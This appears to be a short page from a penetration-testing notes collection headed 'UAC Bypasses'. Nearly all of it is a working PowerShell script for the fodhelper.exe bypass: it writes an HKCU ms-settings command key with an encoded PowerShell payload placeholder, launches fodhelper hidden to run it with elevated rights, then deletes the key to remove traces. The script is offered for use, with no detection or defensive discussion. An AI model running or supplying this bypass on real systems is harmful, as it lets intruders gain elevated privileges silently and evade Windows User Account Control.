UAC Bypasses

Tool to Find

​
​

Fod Helper

1
https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1
2
​
3
# Create reg structure
4
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
5
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
6
​
7
# Place command in
8
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd.exe /c powershell -encoded <encodecommand>" -Force
9
​
10
# Launch
11
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
12
​
13
# Clean
14
Start-Sleep 3
15
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
Copied!
​
Last modified 1yr ago
Copy link